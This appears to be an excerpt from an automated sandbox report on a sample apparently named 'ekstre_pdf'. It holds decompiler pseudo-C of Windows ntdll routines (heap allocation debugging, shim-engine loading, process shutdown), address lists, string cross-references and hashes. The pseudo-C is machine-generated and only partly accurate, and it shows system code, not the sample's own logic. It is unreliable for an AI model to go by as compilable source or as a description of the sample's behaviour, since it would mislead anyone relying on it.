0x34108793
0x34108796
0x3410879e
0x00000000
0x00000000
0x341087b2
0x3410879e
0x34108760
0x3410876f
0x34108774
0x34108779
0x00000000
0x00000000
0x00000000
0x00000000
0x34108779
0x3410875e
0x3410889b
0x341088a4
0x341088a5
0x341088b0

Strings

svchost.exe, xrefs: 341086E8
csrss.exe, xrefs: 34108700
services.exe, xrefs: 34108716
lsass.exe, xrefs: 34108721
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 34108750
SegmentHeap, xrefs: 34108769
DefaultBrowser_NOPUBLISHERID, xrefs: 34108880
runtimebroker.exe, xrefs: 341086F3
smss.exe, xrefs: 3410870B
heapType, xrefs: 3410874B

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 72f4ccdefbe57c52f0865efce2f25a8ed989af838ae9afbf71c25214fb22c0f2
Instruction ID: b4e172c94a6d1df55d16e58b5a6870f0379e3748ebcb3d0d47b12ca8fa67931f
Opcode Fuzzy Hash: 72f4ccdefbe57c52f0865efce2f25a8ed989af838ae9afbf71c25214fb22c0f2
Instruction Fuzzy Hash: 03519DB56087159BE325CF198980B9BBBECFB84294F44C99EF99983141E7B0D604CF92

Uniqueness

Uniqueness Score: -1.00%

Function 3410F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E3410F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x3413d320);
				E340B7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E34057662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E3410F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E3405B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E3406FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E34110835(_t188, 0);
						_t184 = E34075D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E34110D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E3411D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E34093AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E3408FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E34110835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x341547c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x341547c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x341547c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E3405B910();
								} else {
									E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E3410823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E3405B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E3405B910();
								} else {
									E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E3405B910("Just allocated block at %p for %Ix bytes\n",  *0x341547c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x341547a1 = 1;
									 *0x34154100 = 0;
									asm("int3");
									 *0x341547a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x34153748; // 0x0
					 *0x341591e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x3410f0a5
0x3410f0a7
0x3410f0ac
0x3410f0b3
0x3410f0b5
0x3410f0ba
0x3410f0bd
0x3410f0c7
0x3410f0e3
0x3410f0e6
0x3410f0f4
0x3410f0f9
0x3410f0fb
0x3410f3d2
0x3410f3d2
0x3410f3d5
0x3410f3d5
0x3410f3d8
0x3410f3df
0x3410f3e4
0x00000000
0x3410f3e4
0x3410f104
0x3410f106
0x3410f10b
0x3410f111
0x3410f114
0x3410f117
0x3410f119
0x3410f11c
0x3410f11e
0x3410f11e
0x3410f12e
0x3410f134
0x3410f137
0x3410f13b
0x3410f13b
0x3410f13c
0x3410f13f
0x3410f142
0x3410f144
0x3410f350
0x3410f350
0x3410f356
0x3410f359
0x3410f378
0x3410f37d
0x3410f35b
0x3410f370
0x3410f375
0x3410f383
0x3410f38e
0x00000000
0x3410f14a
0x3410f14a
0x3410f14d
0x00000000
0x00000000
0x3410f153
0x3410f156
0x3410f15e
0x3410f163
0x3410f16a
0x3410f16a
0x3410f170
0x3410f170
0x3410f177
0x3410f186
0x3410f188
0x3410f18b
0x3410f18f
0x3410f194
0x3410f196
0x00000000
0x3410f19c
0x3410f19c
0x3410f19f
0x3410f1a3
0x3410f1ac
0x3410f1ac
0x3410f1ac
0x3410f1ae
0x3410f1b0
0x3410f1b3
0x3410f1b6
0x3410f1bb
0x3410f1c5
0x3410f1c8
0x3410f1ca
0x3410f1cb
0x3410f1cf
0x3410f1cf
0x3410f1c8
0x3410f1d4
0x3410f1d8
0x3410f208
0x3410f20b
0x3410f20e
0x3410f1da
0x3410f1dc
0x3410f1e1
0x3410f1e6
0x3410f1ed
0x3410f1ff
0x3410f1ef
0x3410f1f0
0x3410f1f5
0x3410f1f8
0x3410f1fb
0x3410f1fb
0x3410f202
0x3410f202
0x3410f202
0x3410f211
0x3410f214
0x3410f218
0x3410f21b
0x3410f227
0x3410f22d
0x3410f22d
0x3410f22d
0x3410f22f
0x3410f236
0x3410f238
0x3410f23c
0x3410f23c
0x3410f244
0x3410f24a
0x3410f250
0x3410f2be
0x3410f2c1
0x3410f2c4
0x3410f2c9
0x00000000
0x00000000
0x3410f2cf
0x3410f2d2
0x3410f2d5
0x00000000
0x00000000
0x3410f2db
0x3410f2e2
0x00000000
0x00000000
0x3410f2ec
0x3410f2f3
0x00000000
0x00000000
0x3410f2f9
0x3410f2ff
0x3410f302
0x3410f321
0x3410f326
0x3410f304
0x3410f319
0x3410f31e
0x3410f337
0x3410f338
0x3410f343
0x00000000
0x3410f252
0x3410f252
0x3410f255
0x3410f274
0x3410f279
0x3410f257
0x3410f26c
0x3410f271
0x3410f27f
0x3410f28d
0x3410f295
0x3410f295
0x3410f29b
0x3410f29f
0x3410f2a5
0x3410f2ac
0x3410f2b2
0x3410f2b3
0x3410f2b3
0x00000000
0x3410f29f
0x3410f250
0x3410f196
0x3410f0c9
0x3410f0ce
0x3410f0d6
0x3410f0dc
0x3410f3e7
0x3410f3ea
0x3410f3f6
0x3410f3f6

APIs

RtlDebugPrintTimes.NTDLL ref: 3410F0D6

Strings

HEAP[%wZ]: , xrefs: 3410F267, 3410F314, 3410F36B
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3410F33E
HEAP: , xrefs: 3410F274, 3410F321, 3410F378
RtlAllocateHeap, xrefs: 3410F0ED
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3410F389
Just allocated block at %p for %Ix bytes, xrefs: 3410F288

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 81ec0aa1f7ef1b13c43bb79a0e59a81551b6e5fea6ddc55c72a4c2e3b0dd761b
Instruction ID: d69829e4514f6f45be8e063d67ca03ff218bc5966d09b9f6a4c34f291eac9c0f
Opcode Fuzzy Hash: 81ec0aa1f7ef1b13c43bb79a0e59a81551b6e5fea6ddc55c72a4c2e3b0dd761b
Instruction Fuzzy Hash: FF91F039A04A45DFEB02DFA9C581B9DBBF2FF49324F0484D9E441AB2A1CBB59941CF14

Uniqueness

Uniqueness Score: -1.00%

Function 3405640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150
timeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E3405640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x3415b370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E34056C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x341537c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E3405BA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E340A4B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E340DE692();
					_t85 =  *0x341537c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E3407E8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E34056B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E3408E7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x341537c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E340DE692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x341537c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x34155d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E34097DF6( *((intOrPtr*)(_t108 + 0xc)));
					E3407D3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E34056868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x341537c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x34159208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x34155b24; // 0x3c52ce0
					asm("ror esi, cl");
					 *0x341591e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E34056565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
							E34073BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}

0x34056415
0x34056422
0x3405642e
0x3405642f
0x34056434
0x3405643a
0x3405643b
0x34056440
0x34056446
0x3405644e
0x34056458
0x34056460
0x34056465
0x3405646c
0x340b9770
0x340b9776
0x340b9779
0x340b97b3
0x340b97b3
0x340b97dd
0x340b97dd
0x340b97e3
0x340b97e3
0x34056542
0x34056542
0x3405654a
0x340b982b
0x340b982b
0x34056557
0x34056558
0x34056559
0x34056564
0x34056564
0x340b977b
0x340b977c
0x340b9781
0x340b9783
0x340b9788
0x340b97a0
0x340b97a0
0x340b97a5
0x340b97aa
0x340b97b0
0x00000000
0x340b97b0
0x3405647e
0x3405648b
0x34056498
0x3405649e
0x340b97ed
0x340b97ed
0x340564a4
0x340564a6
0x340b97f7
0x340b97fc
0x340b97fe
0x340b97ce
0x340b97d3
0x340b97d8
0x340b97d8
0x340b97db
0x00000000
0x340564ac
0x340564b0
0x340564be
0x340564c3
0x340564cc
0x340564d1
0x340564d8
0x340b9802
0x340b9808
0x340b980b
0x00000000
0x00000000
0x340b978f
0x340b9790
0x340b9795
0x340b9796
0x340b979b
0x00000000
0x340b979b
0x340564de
0x340564eb
0x340564f1
0x340564f9
0x34056507
0x34056510
0x3405651c
0x34056526
0x3405652c
0x3405653c
0x340b981d
0x340b981d
0x3405653c
0x00000000
0x34056526

APIs

RtlDebugPrintTimes.NTDLL ref: 3405651C

Part of subcall function 34056565: RtlDebugPrintTimes.NTDLL ref: 34056614
Part of subcall function 34056565: RtlDebugPrintTimes.NTDLL ref: 3405665F

Strings

apphelp.dll, xrefs: 34056446
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 340B97B9
Getting the shim engine exports failed with status 0x%08lx, xrefs: 340B9790
LdrpInitShimEngine, xrefs: 340B9783, 340B9796, 340B97BF
minkernel\ntdll\ldrinit.c, xrefs: 340B97A0, 340B97C9
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 340B977C

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 941ee7cefafd8f80d2b8e1468b160cfbd88a704d60af47d3ed9f0349faa4d9e6
Instruction ID: ae0d86d3c068694ac85797ee6a492a7a31b8eda3a8189a13763894fd8c312498
Opcode Fuzzy Hash: 941ee7cefafd8f80d2b8e1468b160cfbd88a704d60af47d3ed9f0349faa4d9e6
Instruction Fuzzy Hash: 275168717487049FE720DF21C990E9A7BE8EB84798F4009EDE999A7260DA30D944CF97

Uniqueness

Uniqueness Score: -1.00%

Function 3408D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E3408D6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x3413c5e8);
				_t68 = E340B7BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x34155da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x341537c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E340DE692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x34155dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x34155da8 = 1;
				if( *0x341565f0 != 0) {
					_t137 =  *0x341591f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x341591e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push("true");
					E34064779(_t74, _t118);
				}
				if(( *0x3415391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x34159234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x34159234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x341568c8;
					if( *0x341568c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E340E0FC8();
							 *0x341568c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E3408D8F0();
					}
					_t68 = E3408D898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x34155da0; // 0x3c79700
				L8:
				if(_t129 != 0x34155d9c) {
					_t18 = _t129 - 0x10; // 0x3c796f0
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x3c79ff0
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x76b55cd0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E3407DC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E3407F0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E3407DCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E3408D886();
					}
					goto L8;
				}
				_t119 =  *0x34155b24; // 0x3c52ce0
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E3407DC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x34155b24; // 0x3c52ce0
					E3407F0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E3408D88F();
				}
				goto L15;
			}

0x3408d6d0
0x3408d6d2
0x3408d6d7
0x3408d6dc
0x3408d6e3
0x3408d6ed
0x3408d810
0x3408d813
0x3408d81f
0x3408d81f
0x3408d6f3
0x3408d6f9
0x3408d6fc
0x3408d6ff
0x3408d702
0x3408d709
0x340cf0c2
0x340cf0c2
0x3408d716
0x340cf0cd
0x340cf0e7
0x340cf0ec
0x340cf0ec
0x3408d71c
0x3408d71f
0x3408d724
0x3408d732
0x3408d86d
0x3408d873
0x3408d875
0x3408d877
0x3408d879
0x3408d87f
0x3408d87f
0x3408d738
0x3408d740
0x3408d742
0x3408d744
0x3408d744
0x3408d750
0x340cf0f4
0x340cf0f7
0x340cf0fe
0x340cf101
0x340cf108
0x340cf10b
0x340cf10d
0x00000000
0x00000000
0x340cf113
0x340cf117
0x3408d7ed
0x3408d7ed
0x3408d7f3
0x3408d7fa
0x340cf13c
0x340cf13f
0x340cf145
0x340cf14a
0x340cf14a
0x340cf13f
0x3408d800
0x3408d804
0x3408d806
0x3408d806
0x3408d80b
0x00000000
0x3408d80b
0x3408d756
0x3408d756
0x3408d75a
0x3408d75d
0x3408d766
0x3408d76c
0x3408d76e
0x3408d76e
0x3408d771
0x3408d774
0x3408d774
0x3408d777
0x3408d77a
0x3408d77a
0x3408d77d
0x3408d782
0x3408d78d
0x3408d794
0x3408d799
0x3408d79f
0x3408d79f
0x3408d7a1
0x3408d7a7
0x3408d7ac
0x3408d7af
0x3408d7b2
0x3408d7b6
0x3408d7da
0x3408d7da
0x3408d7b8
0x3408d7b9
0x3408d7c0
0x3408d7c5
0x3408d7cc
0x3408d7cf
0x3408d7cf
0x00000000
0x3408d782
0x3408d7e1
0x3408d7e7
0x3408d7eb
0x3408d820
0x3408d827
0x3408d82c
0x3408d832
0x3408d834
0x3408d83a
0x3408d83f
0x3408d842
0x3408d84a
0x3408d84f
0x3408d856
0x3408d856
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 3408D879

Part of subcall function 34064779: RtlDebugPrintTimes.NTDLL ref: 34064817

Strings

Process 0x%p (%wZ) exiting, xrefs: 340CF0D1
$, xrefs: 3408D820
LdrShutdownProcess, xrefs: 340CF0D8
minkernel\ntdll\ldrinit.c, xrefs: 340CF0E2
$, xrefs: 3408D78D

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
